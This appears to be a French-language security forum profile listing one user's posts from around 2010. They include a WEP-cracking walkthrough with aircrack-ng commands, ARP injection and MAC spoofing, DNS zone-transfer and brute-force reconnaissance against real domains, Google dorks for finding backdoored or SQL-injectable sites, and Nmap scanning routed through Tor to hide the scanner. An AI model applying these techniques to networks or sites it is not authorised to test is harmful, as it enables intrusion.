Aller au contenu
Règlement du forum ×

unkn0wn

Membres
  • Compteur de contenus

    28
  • Inscription

Tout ce qui a été posté par unkn0wn

  1. www.dzboom.com site de vente en ligne d'articles destinée aux femmes [parfums, bijoux, vêtements, cosmetiques ]
  2. salut tu peut combiner (Tor-Privoxy) pour changer d'adresse ip (comme l'a indiquer diegol) combiné a Google Sharing sa te permettra d’être plus anonyme avec tes requête sur google User Agent Switcher n'est pas pour les IP mais il est utile aussi et pour finir utilise sa pour changer l'adresse ip dans les Headers HTTP http://www.paulds.fr/2010/06/ipfu$ck-alors-comme-ca-ladresse-ip-est-une-donnee-sure il faut enlevé le $ apré ipfu
  3. c'est vrai que si ton utilisation d'internet se limite a facebooké, écouté des mp3 ou maté les dernier video youtube l'anonymat ne veut pas dire grand chose
  4. la guère froide était qu'entre les russe et les américain n’empêche que tts le monde y était engagé que sa soit d'une manier officiel ou officieuse, en plus dans une cybere guerre je pense pas que l'esprit de polarité ou d’appartenance compte âpre tts avec internet tts est devenu si petit, et les frontière n'existe plus donc si les USA peuvent bien recruté/utilisé des jeunes de partout tans que les deux partie y trouve leurs compte je vois pas pk elle le ferai pas.
  5. je pense que l'US military peut faire appelle/utiliser l'un groupe de hacker les plus performant du monde, en plus s'a n'implique pas que les militaires, certain groupe privé peuvent y trouver leurs bonheur en vendant de l'information ou en facilitant la tache a l'armé
  6. Au moment ou on se pose toujours les questions, faut t'il mettre ma photo sur mon avatar ou non ? [ allé je vais les mettre apré tts je risque rien et c'est quoi cette paranoya :-/ ] v0ir sa ou bien doit t'ont protéger le réseau wifi ou non, [apré touts c'est juste pour avoir une connexion internet qu'il vas être cr.acké diront certains d'entre vous] v0ir sa ou plus intéressant encore, est il important de surfé anonymement sur internet?, [l'autre fois j'ai parler a un ami des différents moyens de préservé son anonymat sur le net il m'a répondu franchement qu'il croyait que c’était illégale d'utilisé sa...] LA chine a développer son propre système d'exploitation Baptiser Kylin " Originalement dérivé de FreeBSD 5.3, Kylin 3.0 est aujourd’hui basé sur un noyau Linux 2.6 renforcé et il possède en outre un système d’encryption propriétaire" touts en développant leurs propre modèle de processeur qui permettrai de se protéger contre l'injection de code malicieux dans les processus en gros la chine veut être la plus forte nation en matière d'attack et de défense cybernétique pour ce qui se prépare.. Un peut doc sur le sujet Télécharger Kylin Système d’exploitation chinois inviolable débattu au Congrès Américain Mais que se prépare t'il ? d'autre par le pentagone annonce que la guère cybernétique commencera le 1er octobre "1000 Us elite military hackers and internet spys" déclarant que "We have to have offensive capabilities, to, in real time, shut down somebody trying to attack us." un peut de doc / source I un peut de doc/ source II vous l'avais compris maintenant c'est sur la toile que la guère commence // ou du moin elle se prépare je vous Lesse médité avec ce screen shoot qui parle de lui même pris par chevrosky [banis O_o ] sur sa propre machine ou plutôt son petit centre calculateur perso ) Au passage je te remercie Chevrosky pour les liens et le screen shoot http://2.bp.blogspot.com/_Tw6T1F2_8Xc/TI5o-u9fXtI/AAAAAAAAAKU/yebS9uy_L90/s1600/def.png pour ceux qui n’arrive pas a déchiffré l'image c'est simple, les log du parfeux démontre que plusieurs attacks ont étaient stoppée provenant de l’équipe du DEF CON
  7. pour ceux qui disent que la protection par filtrage d'adresse MAC est suffisante => http://www.alobbs.com/macchanger/ pour ceux qui croix qu'un bon mots de passe ne peut pas être cr@cké => http://code.google.com/p/pyrit/ pour ceux qui croix qu'on fait tts sa juste pour avoir accée a internet => http://www.torrentreactor.net/torrents/3273984/DEFCON-17
  8. avant tous j’espère que cette fois mon sujet ne disparaîtra pas pour je ne sais quelle raison. et si il est supprimé sous prétexte que c'est pas légale de parlé de sa ou bien qu'il faut pas divulgué ce genre d'informations je vous pris de supprimé le forum sécurité informatique c'est mieux vous y gagnerais en espace et en temps A tester seulement dans votre réseau local - Scénario: -Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté logiciels requis: 1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté 2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA 3-un *****er pour pouvoir déchiffré la clé wep je vous conseille la suite Aire.*****-ng qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, air*****-ng, airmon-ng] ou bien vous pouvez Utilisé la distribution BackTrack,(en live cd ou avec une clé usb) Backtrack contient tous ce qu'il faut pour ce tutoriel NB: je précise que j'utilise un système d'exploitation "Linux" Notation: MAC: adresse mac de ma carte wi-fi BSSID : adresse MAC du point d'accée ESSID: nom du point d'accès Channel: le canal du point d'accès ( de 1 jusqu'à 12) Un peut de théorie: le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme RC4 pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP). La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités. pour les failles on peut cité: - le cryptage RC4 présente des faiblesses. - La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications. - De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits. Pour pouvoir cr@cké cette clé WEP on vas: 1-sniffer le réseau pour voir les points d'acceé 2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session 3-kr@cké les clé de session pour avoir la clé Pratique: 1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng": [le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous] [root@darkstar ]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11bg Mode:Managed Frequency:2.462 Retry min limit:7 RTS thr:of Fragment thr=2352 Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed [root@darkstar# airmon-ng start wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) notez que le mode moniteur est activé sur mon0, c'est parce que ma carte est une Atheros elle peut crée des carte virtuelle on peut vérifier avec iwconfig [root@darkstar dragoun]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:"" Mode:Managed Frequency:2.412 GHz mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz RTS thr:off Power Management:ofLink Quality:0 Signal level:0 Noise level:0 2-Sniffer le réseau et détecté les points d'accès et les clients: [root@darkstar dragoun]# airodump-ng mon0 qui me renvoi ce résultat 1: BSSID => adresse MAC du point d'accée 2: #DATA =>les pâques récupéré,qui vont servir a avoir la clé WEP 3: ENC => type de cryptage [ dans ce cas WEP] 4: ESSID => Nom du point d'accé 5: STATION => L'adresse MAC d'un client qui est connecté sur le point d'accès -j'ai oublier d'encadré: CH (entre #DATA et ENC) => canal du point d'accès maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante : [root@darkstar ]# airodump-ng -w /home/*****/*****-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0 -w: le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par air*****-ng âpre) -c 1 : sniffé sur le canal 1 -b: sniffer seulement les pâques émis par cette adresse MAC 00:90:D0:DC:B1:E2 (AP) mon0: interface a utilisé ce qui renvoi le résultat suivant on remarque qu'on 1e minute on a récupéré 2077 #DATA pour cr@cké une clé de 64 bits il nous faut minimum 10.000 data et pour une 128 bits il faut 50.000 data, ou plus dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits 3- Injecter des paquet: afin d'avoir nos 50.000 DATA rapidement on vas encore stimulé le réseau en envoyant des pâques ARP a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (spoofé l'adresse MAC du client) [root@darkstar ]# aireplay-ng -3 -e SpeedTouch345B2D -a 00:90:D0:DC:B1:E2 -h 00:19:7E:01:A3:70 mon0 - 3: pour dire qu'il faut injecter des pâques ARP - e : nom du point d'accés - a : adresse MAC du point d'accès - h: adresse MAC du client (pour faire croire que les pâques viennent de lui) mon0: interface wi-fi - Apré 15 minutes on remarque qu'on a récupéré 56.689 DATA ce qui suffit même pour une clé 128 bits 4- cr@cké les paquets: on récupéré le fichier enregistré avec airodump-ng et on en le ***** avec air*****-ng [root@darkstar ]# air*****-ng /home/*****/*****-wep-01.cap -b 00:90:D0:DC:B1:E2 *****-wep-01.cap: fichier sur le quelle on a sauvegardé lespâques avec airodump-ng -b: adresse de AP KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1" + EDIT CONTENU HORS CHARTE [/color]
  9. salut peut être que c'est le ventilateur qui tourne pas bien ( dans la plus part des cas il faut le nettoyée) ps: sa serai bien si vous nous donnez le model de votre pc, ainsi que le système d'exploitation
  10. En Fr : http://www.logic-sunrise.com/news-126726-reverse-engineering-du-psjailbreak-topic-technique.html http://i.imgur.com/GJwFO.jpg Clones déja annoncées : http://www.logic-sunrise.com/news-126881-hack-ps3-les-clones-sont-la.html http://x3jailbreak.com/ Laissons le " Social Engineering Specialist " ( celui qui critique les exploits de geohot ) nous dire ce qu'il pense : http://streetskaterfu.blogspot.com/2010/08/psjailbreak-sad-truth.html
  11. L'une des étape pour tester la sécurité d'un réseau c'est de l'exploré et de collecté le maximum d'informations (nom de hots, plages IP, Whois, DNS,...etc) . pour cela il y 'a divers ressources et méthodes mais on vas s’intéresse a la reconnaissance DNS et particulièrement le Brute force Dns et les transferts de zone [Théorie] C'est quoi le DNS ? Sur Internet, les machines du réseau sont identifiées par des adresses Ip( 72.14.253.191). Néanmoins, ces adresses ne sont pas très agréables à manipuler, c'est pourquoi, on utilise les noms. L'objectif a alors été de permettre la résolution des noms de domaines qui consiste à assurer la conversion entre les noms d'hôtes et les adresses Ip. La solution actuelle est l'utilisation des Dns (Domain Name System) . Pour plus d'informations : http://www.frameip.com/dns/ Transferts de zone: On utilisé Le transferts de zone DNS pour lister l'ensemble des machines d'un domaine dont on veut tester la sécurité. Le transfert de zones permet à un serveur DNS, en général un serveur secondaire, d'interroger le serveur primaire du domaine, pour lui demander la configuration DNS intégrale le concernant. et ainsi on récupère la liste les sous-domaines et leurs adresses IP mais cette technique est de moins en moins possible avec les nouvelles mesures de sécurité qui n'autoriser les transferts de zone DNS qu'entre le serveur DNS principal et les serveurs DNS secondaires de leur propre domaine, alors qu'auparavant, ce type de transferts étaient souvent autorisés à n'importe qui. Brute force DNS: Vue que le transfert de zone ne donne pas toujours des résultat on vas s’intéressé a la méthode du brute force Pour sa on a 2 méthodes Attaque par dictionnaire et qui consiste a prendre une partie du domaine et essayer touts les combinaison possibles Exemple: pour www.google.dz on prend google.dz et on essai de trouvé les sous domaine smtp.google.fr ftp.google.fr vpn.google.fr ... etc ainsi le dictionnaire continent la premier partie du lien a savoir (smtp, ftp, vpn ...etc) dans la 2em méthode on a pas besoin de dictionnaire car on vas généré touts les combinaisons possible (2 lettres par exemple) pour essayer de trouvé des services non listé dans le dictionnaire ce qui nous renvoi ce résultat: fs.google.dz lm.google.dz jp.google.dz [Pratique] pour mètre en pratique touts sa on vas utilisé un petit script écrit en perle dnsenum.pl _______________________________ # ./dnsenum.pl bing.com -f dns.txt dnsenum.pl VERSION:1.2 ----- bing.com ----- ----------------- Host's addresses: ----------------- bing.com. 1832 IN A 65.55.175.254 ------------- Name servers: ------------- ns1.msft.net. 2345 IN A 65.55.37.62 ns2.msft.net. 2528 IN A 64.4.59.173 ns3.msft.net. 2345 IN A 213.199.161.77 ns4.msft.net. 2345 IN A 207.46.75.254 ns5.msft.net. 2528 IN A 65.55.226.140 ----------- MX record: ----------- mailb.microsoft.com. 2863 IN A 131.107.115.215 mailb.microsoft.com. 2863 IN A 205.248.106.30 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for bing.com on ns2.msft.net trying zonetransfer for bing.com on ns3.msft.net trying zonetransfer for bing.com on ns4.msft.net trying zonetransfer for bing.com on ns1.msft.net trying zonetransfer for bing.com on ns5.msft.net ------------------------------ Brute forcing with dns.txt: ------------------------------ abc.bing.com. 3600 IN A 65.55.175.254 admin.bing.com. 3600 IN A 65.55.175.254 ads.bing.com. 3600 IN A 65.55.175.254 adserver.bing.com. 3600 IN A 65.55.175.254 blog.bing.com. 3600 IN A 65.55.175.254 channel.bing.com. 3600 IN A 65.55.175.254 dmz.bing.com. 3600 IN A 65.55.175.254 dns.bing.com. 3600 IN A 65.55.175.254 dns1.bing.com. 3600 IN A 65.55.175.254 extern.bing.com. 3600 IN A 65.55.175.254 forum.bing.com. 3600 IN A 65.55.175.254 https.bing.com. 3600 IN A 65.55.175.254 ... ... _______________________________ on remarque qu'avec bing.com le transferts de zone ne donne rien sur les 5 serveurs DNS mais avec la brute force on a une liste des sous domaines avec leurs adresse IP respectives On vas essayer d’effectuer un transferts de zone avec un autre nom de domaine google.dz _____________________________ #./dnsenum.pl google.dz -f dns.txt dnsenum.pl VERSION:1.2 ----- google.dz ----- ----------------- Host's addresses: ----------------- google.dz. 284 IN A 74.125.91.104 google.dz. 284 IN A 64.233.169.104 google.dz. 284 IN A 74.125.77.104 ... ... --------------------- Trying Zonetransfers: -------------------- trying zonetransfer for google.dz on gdns.google.dz ... google.dz. 300 IN SOA gdns.google.dz. dns-admin.google.com. ( 2009090100 ; ****** 21600 ; Refresh 3600 ; Retry 1209600 ; Expire 60 ) ; Minimum TTL google.dz. 300 IN NS gdns.google.dz. google.dz. 300 IN A 64.233.169.104 google.dz. 300 IN A 74.125.77.104 google.dz. 300 IN A 74.125.91.104 google.dz. 300 IN MX 10 smtp1.google.com. google.dz. 300 IN MX 10 smtp2.google.com. google.dz. 300 IN MX 10 smtp3.google.com. google.dz. 300 IN MX 10 smtp4.google.com. *******.google.dz. 300 adwords.google.dz. 300 adwords.google.com. blogsearch.google.dz. 300 blogsearch.google.com. www.blogsearch.google.dz 300 blogsearch.google.com. boeken.google.dz. 300 book.google.dz. 300 bks0.books.google.dz. 300 IN CNAME books.google.com. bks1.books.google.dz. 300 IN CNAME books.google.com. bks10.books.google.dz. 300 IN CNAME books.google.com. bks2.books.google.dz. 300 IN CNAME books.google.com. bks3.books.google.dz. 300 IN CNAME books.google.com. bks4.books.google.dz. 300 IN CNAME books.google.com. bks5.books.google.dz. 300 IN CNAME books.google.com. bks6.books.google.dz. 300 IN CNAME books.google.com. bks7.books.google.dz. 300 IN CNAME books.google.com. bks8.books.google.dz. 300 IN CNAME books.google.com. bks9.books.google.dz. 300 IN CNAME books.google.com. .... ... ... _____________________________ Cette fois le transferts de zone a donné des résultats avec google.dz
  12. Bon soir Aparament un exploit vien d'etre fréchment codé et d'apré le screen shot méme si quelqu'un change le mots de passe par defaut sa passe tjr , joli joli
  13. salut et bienvenue a toi je ne sauré dire quelle matérielle ils utilisent a tamanraset (quoi que je croix que c'est le même qu'ici, modems ZTE, Thomson.. sa dépend de l’opérateur) mais en ce qui consérne la reconnaissance des matériaux par Linux je pense pas que sa posera problème. PS: tu a installé quelle distribution de Linux ?
  14. Phrack est un magazine électronique underground écrit par et pour des hackers depuis 1985 Vous trouverez sur le site toutes les traductions du magazine phrack en français disponibles sur internet. Certaines sont reprises de cites divers, d'autres sont faites maison, mais le but est de fournir l'ensemble le plus complet de traductions francophones de phrack. Lien : Traductions françaises de Phrack
  15. @ Boss_Med effictivment le sit est tres conu et sa base de donné est tres intéressants, merci @ Chevrosky OoOoOoh que oui il y'a mieux que les Google Dorkzz et je viens de m'en rendre compte Grasse a un certain Chevrosky "je ne sais pas si tu a déjà fait sa connaissance" Peut être que sa sera le sujet du prochain poste
  16. Bon soir a vous ^^ , je voudrai vous parler un peut des Google Dorks ou si vous préféré "The Dark Side Of Google" Utilisé Google pour trouver/découvrir des sites vulnérables ou bien des informations sensibles ou même secrètes (tq des mots de passe ou bien des informations personnelles) en quelques minutes c'est possible avec ce qu'on appelle les 'Google Dorks' ou bien le 'Google h@cking' [Théorie] Google dork ? C'est des requêtes construites d'une façon judicieuse et qui utilisent des opérateurs de recherche spécifique pour trouvé un contenu ciblé exemple: effectuer cette recherche sur Google: site: www.fbi.gov filetype: doc nous renvoi tous les fichiers doc dans le site www.fbi.com On peut utilisé ces opérateurs pour cherches quelque chose de plus intéressante que des fichiers doc mais avant sa voici une petite liste de quelques opérateurs qui vont nous être utiles dans nos recherches site: permet d’effectuer la recherche dans le site Exemple: kill site:www.fbi.gov (cherche le mots kill dans le site www.fbi.gov) filetype: permet de cherché un type de fichier spécifique Exemple: site:www.fbi.gov filetype:doc (cherche les fichiers doc disponible dans le site www.fbi.com) link: L’utilisation de cet opérateur suivit de l’adresse Internet d’un site connu et apprécié permet souvent d’en trouver d’autres de nature similaire. allintitle: Google restreint les résultats aux sites dont le titre contient les termes inscrits. allinurl: Google restreint les résultats aux sites dont l'adresse Internet contient le(s) terme(s) inscrits dans la requête. allintext: Google restreint les résultats aux sites dont le texte contient les termes inscrits dans la requête. [Pratique] #1-On vas essayer de trouvé des serveurs piraté et qui contiennent des Backdoor en php par exemple allintext:”Safe-mode: OFF (not secure)” les backdoor en php contiennent cette partie dans leurs code source, et l’opérateur allintext vas chercher les pages web qui contiennent ce bous de code et de cette manier on aura une liste de site infecté #2-Trouver des points d'injections sql avec sa inurl:buy.php?category= cette recherche permettra de trouvé des sites qui peuvent être vulnérable a des injections sql ____ le principe est claire ~ libéré votre imaginations
  17. BackTrack est une distribution Linux, qui a comme objectif fournir une distribution regroupant l'ensemble des outils nécessaires aux tests de sécurité d'un réseau. La dernier version de BackTrack est la version 4 , elle est baser sur Ubuntu contrairement au 3 versions précédente baser sur Slackware étant donné que la version 4 est baser sur Ubuntu on peut utilisé les puissants logiciels de BackTrak sur Ubuntu, pour cela on doit suivre ces étapes : 1~ On commence par récupéré la signature numérique: # wget -q http://archive.offensive-security.com/backtrack.gpg -O-| sudo apt-key add -ok- 2~ On ajoute l'adresse du dépôt dans la liste des sources # sudo echo "deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse" > /etc/apt/sources.list 3~ Pour finir on met a jours la liste des paquets # apt-get update 4~ Maintenant en utilisant le gestionnaire de paquets Synaptic (Systéme => Administration => Gestionair de paquets synaptique) vous remarquez que vous avez les applications Backtrack il ne vous reste qu'a télécharger ce dont vous avez besoin
  18. effectivement, avec User Agent Switcher on a plus de choix merci
  19. on vas parler de l'utilisation de Nmap et de Tor et sur comment combiner les performances du premier a l'anonymat du deuxième sur Linux.. Bon, une petit présentation pour les néophyte Tor (littéralement : le routage en oignon) est un réseau mondial décentralisé de routeurs, organisés en couches,(nœuds ) dont la tâche est de transmettre de manière anonyme des paquets TCP. C’est ainsi que tout échange Internet basé sur TCP peut être rendu anonyme en utilisant Tor. il est disponible pour Windows, Linux et Mac + site officiel: http://www.torproject.org Nmap est un scanner de ports open source créé par Fyodor et distribué par Insecure.org ,Il est conçu pour détecter les ports ouverts, identifier les services hébergés et obtenir des informations sur le système d'exploitation d'un ordinateur distant. Il est disponible sous Windows, Mac OS X, Linux, BSD et Solaris.. +site officiel http://www.Insecure.org Notre objectif est de scanner notre serveur avec Nmap sans laisser de traces (adresse ip) sur les fichiers logs de la machine distante (serveur) pour cela on vas faire passer les connections effectuer par Nmap par le réseau Tor,en utilisant l’outil Proxychains. il faut noter que Tor ne fait passer que les connections TCP autrement dit on ne peut rendre anonyme que ce protocole ce qui limite notre champs d'action avec Nmap (on ne peut pas effectuer une reconnaissance UDP ou ICMP par exemple). +Il faut commencer par 1- installer TOR : http://www.torproject.org/documentation.html.fr 2- installer Nmap : http://nmap.org/download.html 3- installer Proxychains: http://proxychains.sourceforge.net/ [ Proxychains est configuré par défaut pour faire passer les connections a travers le réseau TOR ] et pour pour effectuer le scan : proxychains nmap -PN -sT -sV -n -p 80,21,146,111 64.233.181.191 quelques explications s'impose avec Nmap on a utiliser -PN pour ne pas envoyer de pings au serveur (Non prise en charge du protocole ICMP par Tor) -sT : pour un scan en mode TCP connect() -sV étection de version -n : ne pas effectuer de résolution DNS -p : les ports distant a scanner et pour finir l'adresse ip du serveur a scanner au final on obtiens ce résultat ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-26 21:33 CET |S-chain|--127.0.0.1:9050--64.233.181.191:21- |S-chain|--127.0.0.1:9050--64.233.181.191:80--OK |S-chain|--127.0.0.1:9050--64.233.181.191:111- |S-chain|--127.0.0.1:9050--64.233.181.191:146- Nmap scan report for 64.233.181.191 Host is up (14s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Google httpd 2.0 (GFE) 111/tcp closed rpcbind 146/tcp closed iso-tp0 Service Info: OS: Linux ____ NB: il faut avoir une bonne connexion (car les timeout peuvent causé un résultat faux négatif)
  20. Salut a tts. Bon c'est mon premier poste j’espère que je me trempe pas de rubrique pour poster sa, si c'est le cas je demande au modérateurs de m'excusé ^^ aujourd’hui j'aimerai vous présenté un add-on nommé Albine . Abine est une extension Firefox et internet explorer elle permet de préservé l'anonymat en surfant et cela en contrôlant les différentes informations qu'on Lesse trené un peut partout telle que les informations personnels dans les formulaires d'inscriptions ou les cookies par exemple cet outille propose plusieurs fonctionnalité je cite a titre d'exemple: -chiffrement des mots de passes enregistré -permet d'utiliser et de gérer plusieurs comptes en même temps, pas besoin de fournir les informations a chaque foi les compte avec leurs informations son déterminé au par avant on peut même déterminé les mesures de sécurité différentes pour chaque site -il vous protège contre les spam et les "web tracker" telle que Google Adssense , Google Analytics et bcps d'autres -protège les e-mails en créant des des adresse temporaire a utilisé sur les formulaire d'inscription en redirigent les e-mails sur la vrai adresse sur le vrai si on le combine avec google sharing et Tor et touts en modifiant quelques header avec modify headers on peut surfer d'une manier nettement plus anonyme pour télécharger et installer Albine il vous suffit de vous rendre sur l'adresse suivant: http://www.getabine.com/
×
×
  • Créer...